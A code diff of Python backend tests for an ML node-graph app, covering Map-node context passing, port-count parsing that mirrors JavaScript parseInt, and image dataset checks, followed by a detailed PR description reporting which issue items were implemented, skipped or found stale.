+    (root / "zzz" / "broken.png").write_bytes(b"")
+
+    with pytest.raises(ValueError) as excinfo:
+        _run({"path": str(root), "split": "(none)"})
+    assert "broken.png" in str(excinfo.value)
+
+
+def test_the_check_costs_a_bounded_number_of_opens(monkeypatch, tmp_path: Path):
+    """A fixed cost, not one that grows with the dataset -- reading every
+    file at build time is exactly what this node exists to defer."""
+    from app.nodes.data import image_folder_dataset_node as node_module
+
+    root = tmp_path / "big"
+    _write_images(root / "cat", 100)
+    opened: list[str] = []
+    real_open = Image.open
+
+    def _counting_open(path, *args, **kwargs):
+        opened.append(str(path))
+        return real_open(path, *args, **kwargs)
+
+    monkeypatch.setattr(Image, "open", _counting_open)
+    _run({"path": str(root), "split": "(none)"})
+    assert 0 < len(opened) <= node_module.VERIFY_SAMPLE_SIZE

--- a/backend/tests/test_map_node.py
+++ b/backend/tests/test_map_node.py
@@ -2,9 +2,31 @@
 
 from __future__ import annotations
 
+from typing import Any
+
 import pytest
 
+from app.core.execution_context import ExecutionContext, MetricSignal
+from app.core.node_base import BaseNode, DataType, PortDefinition
+from app.core.node_registry import registry as node_registry
+from app.core.preset_registry import preset_registry
+from app.nodes.data.transforms._base import SeededAugmentation, seeded_for_node
+from app.nodes.data.transforms.random_horizontal_flip_node import (
+    RandomHorizontalFlipNode,
+)
+from app.nodes.data.transforms.to_tensor_transform_node import (
+    ToTensorTransformNode,
+)
 from app.nodes.dataflow.map_node import MapNode
+from app.schemas.models import (
+    ExposedPortSchema,
+    InternalEdgeSchema,
+    InternalNodeSchema,
+    PresetDefinition,
+)
+
+PROBE_TYPE = "_MapContextProbe"
+PRESET_NAME = "_MapContextProbePreset"
 
 
 def test_node_metadata():
@@ -25,3 +47,201 @@ def test_empty_subgraph_name_raises():
 def test_unknown_subgraph_raises():
     with pytest.raises(ValueError, match="not found"):
         MapNode().execute({"items": [1, 2]}, {"subgraph": "definitely_not_a_real_preset"})
+
+
+# ── the body runs WITH the run's context (#196) ──────────────────────────
+#
+# Before #196 the loop called ``instance.execute(inputs, params)`` directly
+# -- the last node-execute call site in the repo that did not go through
+# ``invoke_node`` -- so every node in a Map body saw ``context=None``. The
+# visible cost was silent: ``seed_pipeline`` returns the raw pipeline when
+# there is no context, so a seeded run's augmentation inside a Map was
+# neither reproducible nor isolated, with no error and no warning.
+
+
+def _augmenting_chain():
+    chain = RandomHorizontalFlipNode().execute({}, {"p": 0.5})["transform"]
+    return ToTensorTransformNode().execute(
+        {"transform": chain}, {})["transform"]
+
+
+class _ProbeNode(BaseNode):
+    """Records what the Map body handed it, then passes its input through.
+
+    ``seeded`` goes through the real ``seeded_for_node`` rather than
+    inspecting the context, so the assertion is about the reported symptom
+    (augmentation is unseeded) and not about the mechanism.
+    """
+
+    NODE_NAME = PROBE_TYPE
+    CATEGORY = "Testing"
+
+    #: One entry per execute, in call order. Reset by the fixture.
+    seen: list[dict[str, Any]] = []
+
+    @classmethod
+    def define_inputs(cls) -> list[PortDefinition]:
+        return [PortDefinition(name="value", data_type=DataType.ANY,
+                               description="passthrough")]
+
+    @classmethod
+    def define_outputs(cls) -> list[PortDefinition]:
+        return [PortDefinition(name="value", data_type=DataType.ANY,
+                               description="passthrough")]
+
+    @classmethod
+    def define_params(cls) -> list:
+        return []
+
+    def execute(self, inputs, params, progress_callback=None, *,
+                context: Any = None) -> dict[str, Any]:
+        seeded = seeded_for_node(_augmenting_chain(), context)
+        if context is not None:
+            context.log_metric("probe", 1.0, step=0)
+        type(self).seen.append({
+            "node_id": getattr(context, "current_node_id", None),
+            "context": context,
+            "seeded": isinstance(seeded, SeededAugmentation),
+            "progress_callback": progress_callback,
+        })
+        return {"value": inputs.get("value")}
+
+
+def _preset(node_ids: list[str]) -> PresetDefinition:
+    """A chain of probes: ``node_ids[0] -> node_ids[1] -> ...``."""
+    return PresetDefinition(
+        preset_name=PRESET_NAME,
+        category="Testing",
+        description="",
+        nodes=[InternalNodeSchema(id=n, type=PROBE_TYPE) for n in node_ids],
+        edges=[
+            InternalEdgeSchema(source=a, sourceHandle="value",
+                               target=b, targetHandle="value")
+            for a, b in zip(node_ids, node_ids[1:])
+        ],
+        exposed_inputs=[ExposedPortSchema(
+            name="in", internal_node=node_ids[0], internal_port="value")],
+        exposed_outputs=[ExposedPortSchema(
+            name="out", internal_node=node_ids[-1], internal_port="value")],
+        exposed_params=[],
+    )
+
+
+@pytest.fixture()
+def probe_body():
+    """Register the probe node type and a two-probe preset, then restore."""
+    _ProbeNode.seen = []
+    saved_nodes = dict(node_registry._nodes)
+    saved_presets = dict(preset_registry._presets)
+    node_registry._nodes[PROBE_TYPE] = _ProbeNode
+    preset_registry._presets[PRESET_NAME] = _preset(["node_0", "node_1"])
+    try:
+        yield _ProbeNode
+    finally:
+        node_registry._nodes.clear()
+        node_registry._nodes.update(saved_nodes)
+        preset_registry._presets.clear()
+        preset_registry._presets.update(saved_presets)
+        _ProbeNode.seen = []
+
+
+def _map(context, items=("a",)):
+    return MapNode().execute({"items": list(items)},
+                             {"subgraph": PRESET_NAME}, context=context)
+
+
+def _context(node_id: str = "map1", seed: int | None = 7) -> ExecutionContext:
+    context = ExecutionContext(seed=seed)
+    context.current_node_id = node_id
+    return context
+
+
+def test_a_seeded_map_body_seeds_its_augmentation(probe_body):
+    """The bug this item was filed for: silently unseeded augmentation."""
+    result = _map(_context())
+    assert result["results"] == ["a"]
+    assert [call["seeded"] for call in probe_body.seen] == [True, True]
+
+
+def test_an_unseeded_map_body_still_keeps_torchs_own_entropy(probe_body):
+    """Passing the context must not start seeding a run that asked for none."""
+    _map(_context(seed=None))
+    assert [call["seeded"] for call in probe_body.seen] == [False, False]
+
+
+def test_body_node_ids_are_qualified_with_the_maps_own(probe_body):
+    """Preset internals are named ``node_0``, ``node_1``, ... so a bare inner
+    id is unique only within one body. Three things key off this field --
+    the transform seed label, ``StatefulModuleMixin``'s weight key and every
+    signal the body emits -- and all three break on a collision."""
+    _map(_context(node_id="map1"))
+    assert [call["node_id"] for call in probe_body.seen] == [
+        "map1__node_0", "map1__node_1"]
+
+
+def test_two_nodes_in_one_body_draw_different_seed_streams(probe_body):
+    """Two same-shaped transform nodes must not derive the same seed: the
+    label is ``transform:<current_node_id>``, so a shared id would give both
+    the same stream and undo the isolation seeding exists for."""
+    context = _context()
+    _map(context)
+    ids = [call["node_id"] for call in probe_body.seen]
+    assert len(set(ids)) == 2
+    assert len({context.derive_seed(f"transform:{i}") for i in ids}) == 2
+
+
+def test_two_map_nodes_sharing_one_preset_do_not_collide(probe_body):
+    """The same preset under two Map nodes: the ids must still differ, or the
+    two bodies would share ``(graph_id, current_node_id, structure_hash)``
+    and therefore share weights."""
+    _map(_context(node_id="map1"))
+    _map(_context(node_id="map2"))
+    assert len({call["node_id"] for call in probe_body.seen}) == 4
+
+
+def test_the_maps_own_current_node_id_survives_the_loop(probe_body):
+    """A per-node COPY, not mutate-and-restore (the rule graph_engine follows
+    since #253), so the Map's own signals stay attributed to the Map."""
+    context = _context(node_id="map1")
+    _map(context, items=["a", "b"])
+    assert context.current_node_id == "map1"
+
+
+def test_the_body_shares_the_runs_collaborators_not_copies(probe_body):
+    """Only the scalar id differs per node. The stop event, the outbox and
+    the node-state store must be the SAME objects, or cancellation and
+    logging would be silently dead inside a Map."""
+    context = _context()
+    _map(context)
+    inner = probe_body.seen[0]["context"]
+    assert inner is not context
+    assert inner.outbox is context.outbox
+    assert inner._stop_event is context._stop_event
+    assert inner.seed == context.seed
+    assert inner.device == context.device
+
+
+def test_body_metrics_are_attributed_to_the_inner_node(probe_body):
+    context = _context(node_id="map1")
+    _map(context)
+    signals, _dropped = context.outbox.drain()
+    metrics = [s for s in signals if isinstance(s, MetricSignal)]
+    assert [m.node_id for m in metrics] == ["map1__node_0", "map1__node_1"]
+
+
+def test_the_body_does_not_get_the_maps_progress_channel(probe_body):
+    """The engine binds that callback to the MAP node's id, so an inner
+    training loop's per-batch frames would arrive on the canvas as the Map's
+    own progress and race the per-item frames Map emits itself."""
+    frames: list[dict] = []
+    MapNode().execute({"items": ["a"]}, {"subgraph": PRESET_NAME},
+                      frames.append, context=_context())
+    assert [call["progress_callback"] for call in probe_body.seen] == [None, None]
+    assert frames, "the Map's own per-item frames must still be emitted"
+
+
+def test_a_body_run_without_a_context_still_works(probe_body):
+    """``execute_graph`` in a test, an exported script: no context at all."""
+    result = _map(None)
+    assert result["results"] == ["a"]
+    assert [call["node_id"] for call in probe_body.seen] == [None, None]

--- a/backend/tests/test_port_count_convention.py
+++ b/backend/tests/test_port_count_convention.py
@@ -1,0 +1,127 @@
+﻿"""One convention for every param that decides how many ports a node has.
+
+Three nodes vary their port count from a param -- ``ComposeTransform``
+(``steps``), ``PythonScript`` (``input_ports`` / ``output_ports``) and
+``Split`` (``chunks``) -- and each used to spell its own ``int(raw)``. The
+canvas reads all three with ``parseInt(String(raw), 10)``
+(``frontend/src/utils/index.ts``'s ``clampCount``), which takes a NUMERIC
+PREFIX where ``int()`` demands the whole string. The two therefore disagreed
+on anything with a tail: the canvas drew ports the engine then rejected as
+invalid input ports (``graph_engine`` port validation).
+
+Only reachable through hand-edited or externally-generated graph JSON -- the
+INT widget cannot produce a float-string -- which is why this was a nit
+(#197) rather than a bug.
+
+The expected column below is ``clampCount``'s answer, computed by hand from
+its source, not from the backend. That is the whole point of the file: it is
+the frontend's behaviour written down where a Python test can check it.
+"""
+
+from __future__ import annotations
+
+import pytest
+
+from app.core.node_base import resolve_count_param
+from app.nodes.data.transforms.compose_transform_node import (
+    DEFAULT_STEPS,
+    MAX_STEPS,
+    MIN_STEPS,
+    _step_count,
+)
+from app.nodes.tensor_ops.split_node import MAX_CHUNKS, _resolve_chunks
+from app.nodes.utility.python_script_node import MAX_PORTS, resolve_port_count
+
+# raw value -> parseInt(String(raw), 10), or None where parseInt gives NaN
+# and clampCount falls back. Verified against the JS semantics, not derived
+# from the Python implementation.
+PARSE_INT = [
+    # the cases that used to diverge
+    ("5.7", 5),        # int("5.7") raised -> fell back to the default
+    ("6 chains", 6),   # ditto
+    ("3px", 3),
+    ("1e3", 1),        # int(float(raw)) would say 1000 -- the wrong fix
+    ("0x5", 0),        # parseInt base 10 stops at the x
+    # the cases that already agreed, kept so the fix cannot break them
+    ("5", 5),
+    (5, 5),
+    (5.7, 5),
+    (-2.7, -3),        # Math.floor, not truncation
+    ("  6  ", 6),
+    ("+3", 3),
+    ("-4", -4),
+    ("99", 99),
+    ("0", 0),
+    ("", None),
+    ("abc", None),
+    (".5", None),
+    ("Infinity", None),
+    (None, None),
+    (float("nan"), None),
+    (float("inf"), None),
+    (True, None),      # String(true) is "true", which parseInt rejects
+]
+
+
+def _clamp_count(parsed: int | None, fallback: int, maximum: int) -> int:
+    """``clampCount`` itself, transcribed. The oracle for the table above."""
+    return max(1, min(maximum, fallback if parsed is None else parsed))
+
+
+@pytest.mark.parametrize("raw,parsed", PARSE_INT)
+def test_python_script_agrees_with_the_canvas(raw, parsed):
+    assert resolve_port_count({"input_ports": raw}, "input_ports") == (
+        _clamp_count(parsed, 1, MAX_PORTS))
+
+
+@pytest.mark.parametrize("raw,parsed", PARSE_INT)
+def test_split_agrees_with_the_canvas(raw, parsed):
+    assert _resolve_chunks({"chunks": raw}) == _clamp_count(parsed, 2, MAX_CHUNKS)
+
+
+@pytest.mark.parametrize("raw,parsed", PARSE_INT)
+def test_compose_transform_agrees_with_the_canvas(raw, parsed):
+    # `resolveDynamicInputs` wraps clampCount in a second
+    # `Math.max(COMPOSE_MIN_STEPS, ...)`, because composing one chain is what
+    # a plain edge already does.
+    expected = max(MIN_STEPS,
+                   _clamp_count(parsed, DEFAULT_STEPS, MAX_STEPS))
+    assert _step_count({"steps": raw}) == expected
+
+
+def test_the_float_string_that_started_this():
+    """`{"steps": "5.7"}` drew five handles on the canvas and validated two,
+    so an edge into step_3 was refused as an invalid input port."""
+    assert _step_count({"steps": "5.7"}) == 5
+
+
+def test_a_missing_param_takes_the_default():
+    assert _step_count({}) == DEFAULT_STEPS
+    assert _step_count(None) == DEFAULT_STEPS
+    assert resolve_port_count(None, "input_ports") == 1
+    assert _resolve_chunks(None) == 2
+
+
+def test_out_of_range_values_clamp_rather_than_raise():
+    assert _step_count({"steps": 99}) == MAX_STEPS
+    assert _step_count({"steps": 0}) == MIN_STEPS
+    assert _step_count({"steps": -5}) == MIN_STEPS
+    assert resolve_port_count({"input_ports": 99}, "input_ports") == MAX_PORTS
+    assert resolve_port_count({"input_ports": 0}, "input_ports") == 1
+    assert _resolve_chunks({"chunks": 999}) == MAX_CHUNKS
+    assert _resolve_chunks({"chunks": -1}) == 1
+
+
+def test_unicode_digits_are_not_counted():
+    """Python's ``\\d`` matches Devanagari; JS ``parseInt`` does not. Written
+    as escapes so a cp950/cp1252 console cannot mangle the test id."""
+    assert resolve_count_param({"n": "\u0967\u0968"}, "n",
+                               default=4, minimum=1, maximum=8) == 4
+
+
+def test_the_helper_clamps_to_the_callers_own_floor():
+    """ComposeTransform's floor is 2, the other two nodes' is 1."""
+    assert resolve_count_param({"n": 1}, "n",
+                               default=2, minimum=2, maximum=8) == 2
+    assert resolve_count_param({"n": 1}, "n",
+                               default=1, minimum=1, maximum=8) == 1


### PR DESCRIPTION
> 中文摘要：處理 #196 和 #197 這兩張從 core#136 檢視留下來的待辦清單，總共九個項目。實際動手改的有五個：Map 子圖內部的節點終於拿得到執行情境（先前一律是 None，導致有設隨機種子的資料增強在 Map 裡完全沒被種下，而且不會有任何錯誤或警告）；預設組合（preset）擷取時會漏掉動態連接埠；指標 CSV 匯出可被公式注入而且 Excel 讀中文會亂碼；ImageFolderDataset 只檢查資料夾不檢查檔案；三個決定連接埠數量的參數各自為政、和畫布的解析方式不一致。另外四個沒有動手，理由寫在下面的表格裡——其中兩個的前提在這段期間已經不成立了，一個和別人正在做的 #224 重疊，兩個是純前端、需要在瀏覽器裡看過再決定。兩張議題都保持開啟，不用結案關鍵字。

Nine items, five implemented, four not. The four that are not are the more useful half of this PR: two rest on premises that stopped being true, one overlaps work in flight, and two are frontend decisions that want a browser before a diff.

## Per-item verdicts

### #196 — four behavioural gaps

| # | Item | Verdict | Evidence |
|---|---|---|---|
| 1 | `Map` body never receives `context` | **Implemented** (prescribed fix partly stale) | Still true at `map_node.py:133`: `instance.execute(node_inputs, params)`, the only node-execute call site outside `invoke_node`. `seed_pipeline` still short-circuits on `context is None` (`transforms/_base.py:325`). **Stale part:** the issue says to mutate `current_node_id` and restore it after the loop, citing `graph_engine.py:1261-1263`. The engine stopped doing that at #253 — it now takes a per-node `copy.copy(context)` (`graph_engine.py:2179-2182`) precisely because mutate-and-read-later raced. Implemented the current pattern; there is nothing to restore. |
| 2 | Preset extraction reads static `define_inputs()` | **Implemented** | Still true at all three sites: `routes_presets.py:118`, `:130`, `preset_registry.py:117`. `ComposeTransformNode.define_inputs()` still hardcodes `{"steps": DEFAULT_STEPS}`. **No interaction with #263**, which changed the container *status* roll-up (`_emit_preset_aware`, reading `container_of` built by preset *expansion*); port schemas are a different path and the two never meet. |
| 3 | Metrics CSV: formula injection, no BOM | **Implemented** | Still true at `routes_runs.py:438-453` (now `:438-500`). No neutralisation of `= + - @ \t \r`; response was `text/csv; charset=utf-8` with no BOM (`:485`). |
| 4 | Nothing sweeps `<data root>/runs/` | **Stale premise + deferred to #224** | See below. |

**Why item 4 is not done.** The issue aims the fix at `Database.prune_runs`. That is the **publish** `runs` table — `migrations.py:104-106` states it outright: *"`Database.prune_runs` is the publish table's retention (`DELETE FROM runs`); `RunStore.prune` is this one's. They are deliberately separate policies and never touch each other's rows."* And a publish run cannot produce a TensorBoard directory at all: `open_run_writer` returns `None` unless `context.can_record_artifacts()`, which is `signals_recorded`, which `graph_engine.py:1952` sets from whether the run has an `on_signal` consumer — and the docstring names *"the REST contract runner"* as one of the paths that has none. So the proposed `shutil.rmtree(run_logdir(run_id))` inside `prune_runs` would iterate an id namespace that never writes those directories.

The runs that *do* write them are `exec_runs`, whose retention is `RunStore.prune` — and that method's docstring already refuses this widening by name: *"Scoped to `kind == "checkpoint"` only… at least one (`tensorboard`) is a DIRECTORY, not a file — widening this beyond checkpoints is a deliberately separate decision."* That, plus #224 being actively reworked in `RunStore.prune` in another worktree, makes this someone else's edit. Left alone; nothing in this PR touches `RunStore.prune` or `resolve_checkpoint_path`.

### #197 — five nits

| # | Item | Verdict | Evidence |
|---|---|---|---|
| 1 | `ImageFolderDataset` never validates the files | **Implemented** | Still true: `image_folder_dataset_node.py` built the `ImageFolder` and returned. |
| 2 | `_missing_root_message` echoes a directory listing | **Stale premise — the fix would be theatre** | See below. |
| 3 | `_step_count` / `clampCount` disagree on a float-string | **Implemented, with a corrected fix** | Still true, and the prescribed `int(float(raw))` is wrong. See below. |
| 4 | `SELECTABLE_DATA_TYPES` ordering | **Deliberately skipped** | Still true (`TRANSFORM` before `ANY` in `DATA_TYPE_COLORS`; last in the backend enum). Membership is identical and the issue itself says nothing is broken — the only effect is dropdown order in one modal. Frontend-only, so it costs a browser e2e pass for zero user-visible benefit. Taking the issue's own second option: leave it, and note that the frontend list is ordered for the dropdown rather than mirroring the enum. |
| 5 | TRANSFORM/DATASET are the two least separable wire colours | **Deliberately skipped** | Still true (`DATASET: #FF9800`, `TRANSFORM: #FFC107`), and the analysis holds — dE76 23.96, of which 21.29 is `a*`. But the issue closes with *"Computed, not verified in a browser — worth an eyeball on the canvas before changing anything,"* and picking a new amber is a design decision, not a chore. Left for a frontend pass. |

**Why #197.2 is moot.** Removing the capped ten-name echo from `_missing_root_message` removes nothing, because torchvision's own `make_dataset` produces a **larger, uncapped** listing one line later. Measured on this branch's venv:

```
>>> ImageFolder("<dir with 12 empty sub-directories>")
FileNotFoundError: Found no valid file for the classes Administrator, Public,
User, e, f, g, h, i, j, k, l, secret-project. Supported extensions are: .jpg,
.jpeg, .png, .ppm, .bmp, .pgm, .tif, .tiff, .webp
```

So `ImageFolderDataset(path="C:/Users", split="(none)")` returns the full listing regardless. Capping our own message while the next call echoes everything would be security theatre. If the enumeration surface is genuinely unwanted, the fix is at `resolve_dataset_root` — confining reads to the data root, which contradicts that function's documented position — not in the error string.

**Why #197.3's prescribed fix is wrong.** The issue proposes `int(float(raw))` on `_step_count` and `resolve_port_count`. Measured:

| raw | frontend `parseInt(String(raw),10)` | backend `int(raw)` | backend `int(float(raw))` |
|---|---|---|---|
| `"5.7"` | 5 | ValueError → fallback | 5 |
| `"1e3"` | 1 | ValueError → fallback | **1000** |
| `"6 chains"` | 6 | ValueError → fallback | ValueError → fallback |
| `"3px"` | 3 | ValueError → fallback | ValueError → fallback |
| `"१२"` | NaN → fallback | **12** (Python `int` takes Unicode digits) | 12 |

`int(float(raw))` fixes `"5.7"` and breaks `"1e3"` — one divergence traded for another. It also leaves `"6 chains"`, `"3px"` and the Unicode-digit case, none of which the issue lists (it claims *"garbage strings … resolve identically"*, which is not so). Implemented instead as one shared `resolve_count_param` in `node_base.py` that mirrors `parseInt` — leading whitespace, optional sign, ASCII digits, ignore the tail; `Math.floor` on real numbers; non-finite and booleans to the fallback, because `String(true)` is `"true"` which `parseInt` rejects.

`Split`'s `_resolve_chunks` was not on the issue's list and is included. It is the same convention with the same `clampCount` mirror, and tightening two of three would have left a third convention behind — the exact outcome the issue asked to avoid.

## Not on either list, found on the way

- **Two `Map` nodes sharing one preset would have collided with each other.** The issue only raises collision *within* one body. Preset internals are named `node_0`, `node_1`, … so a bare inner id is unique only within a body; two Map instances would have shared `(graph_id, current_node_id, structure_hash)` in `StatefulModuleMixin` and produced shared weights. Inner ids are qualified with the Map's own — `map1__node_0`, the `a__b` separator preset expansion already uses.
- **The Map body deliberately does not get the Map's progress callback.** The engine binds that to the Map node's id, so an inner training loop's per-batch frames would arrive on the canvas as the Map's own progress and race the per-item frames Map emits. The body gets the context (state); it does not get the outer node's presentation channel.
- **`int("१२") == 12` in Python.** `parseInt` gives NaN. The shared helper uses `[0-9]` rather than `\d` for exactly this, and there is a test.

## Tests

103 added. Every implemented item was mutation-checked by reverting the source and confirming the matching tests go red.

| Item | Tests added | Mutation | Red |
|---|---|---|---|
| Map context | 10 (`test_map_node.py`) | revert `map_node.py` | 6 |
| Preset ports | 4 (`test_api_presets.py`) | revert `routes_presets.py` + `preset_registry.py` | 3 |
| CSV escaping | 12 (`test_api_runs.py`, shared with BOM) | `_csv_text_cell` returns `text` | 7 |
| CSV BOM | (as above) | drop the `_CSV_BOM +` prefix | 13 |
| ImageFolder files | 6 (`test_image_folder_dataset_node.py`) | drop the `_verify_sample_images` call | 5 of 6 — the sixth is the false-positive guard and correctly stays green |
| Port-count convention | 71 (`test_port_count_convention.py`) | `resolve_count_param` back to `int(raw)` | 17 |

Two mutations were done surgically rather than by reverting the whole file, because removing a module-level symbol turns the run into a collection `ImportError`, which is not a behavioural signal.

Full suite: `4423 passed, 22 skipped`. `ruff check .` clean.

## Issue state

Neither issue gets a closing keyword.

- **#196** — items 1, 2, 3 done; item 4 (runs/ retention) outstanding and belongs with #224.
- **#197** — items 1 and 3 done; item 2 closed out as moot with the transcript above; items 4 and 5 outstanding as a frontend pass.

Comments to that effect go on both issues.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
